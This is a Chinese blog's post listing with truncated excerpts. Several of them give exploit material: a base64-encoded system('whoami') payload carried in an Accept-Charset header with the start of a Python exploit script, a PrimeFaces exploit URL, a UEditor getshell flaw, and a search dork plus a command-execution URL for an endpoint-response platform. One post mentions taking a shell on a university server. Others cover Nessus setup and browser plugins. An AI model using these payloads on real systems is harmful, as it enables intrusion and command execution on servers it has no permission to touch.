去B站咯
摘要:Accept-Encoding: gzip,deflate Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs= 地址 脚本如下: import base64,requests,queue,sys payload = "system('"+sys.argv[2]+"');" 阅读全文
posted @ 2020-12-11 16:25 不想长大a 阅读(82) 评论(0) 推荐(0) 编辑
摘要:exp payload pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC 阅读全文
posted @ 2020-11-25 15:10 不想长大a 阅读(159) 评论(0) 推荐(0) 编辑
摘要:漏洞存在点: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 漏洞原因:controller.ashx文件下只校验ContentType而没校验文件后缀导致getshell。 payload如下, 阅读全文
posted @ 2020-11-17 11:45 不想长大a 阅读(193) 评论(0) 推荐(0) 编辑
摘要:最近在写exp,需要识别远程主机操作系统。 通常判断远程主机操作系统,有以下几种方式: 大小写判断 ttl值判断 扫描器扫描 由于不清楚目标链接是否存在某个文件或者目录,因此使用大小写来判断操作系统,也并非良策。 ttl值可以自定义,因此也不太好判断是否正确。 因此就想到了调用扫描器的扫描结果,来判 阅读全文
posted @ 2020-10-10 09:39 不想长大a 阅读(242) 评论(0) 推荐(0) 编辑
摘要:先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当 阅读全文
posted @ 2020-09-30 14:53 不想长大a 阅读(151) 评论(0) 推荐(0) 编辑
摘要:第一次拿别人家大学服务器的shell,因此就将思路整理了一下,投稿到了freebuf。 链接点这 ps:因为投稿的时间恰好在hw期间,因此稿件太过于敏感,就被删了。 阅读全文
posted @ 2020-09-06 13:06 不想长大a 阅读(181) 评论(0) 推荐(0) 编辑
摘要:不定时更新插件。 插件可以在谷歌商店和火狐商店下载。 SimpleExtManager 管理浏览器插件的一款插件 Wappalyzer 分析网站应用程序的一款插件 User Agent Switcher 切换浏览器的头部的一款插件 FOFA Pro view 简易版的FOFA搜索引擎,可查C段,端口 阅读全文
posted @ 2020-09-05 21:00 不想长大a 阅读(61) 评论(0) 推荐(0) 编辑
摘要:首先是下载nessus nessus下载 然后申请免费的激活码 申请激活码 邮箱填一个能接收验证码的就写,其他随便 收到邮箱后 管理员打开命令行,cd到nessus的安装目录 创建nessus的管理用户 nessuscli.exe adduser admin 获取Challenge code nes 阅读全文
posted @ 2020-08-06 12:59 不想长大a 阅读(232) 评论(0) 推荐(0) 编辑
摘要:刚刚上公司的vpn的时候,突然弹框错误。 下意思的心就慌了,不过稳下来后,一看这不就好像是服务没启动吗? 于是打开运行(win+r),输入services.msc 找到和这个有关的服务 然后再次启动连接,就好了 阅读全文
posted @ 2020-07-23 20:31 不想长大a 阅读(1) 评论(0) 推荐(0) 编辑
摘要:1.找到nessus的安装路径 即nessuscli.exe所在的目录,复制该路径 2.管理员启动cmd(如果直接在搜索栏输入cmd打开命令提示符,可能会提示没有权限) 3.按照截图操作 阅读全文
posted @ 2020-07-21 10:34 不想长大a 阅读(230) 评论(0) 推荐(0) 编辑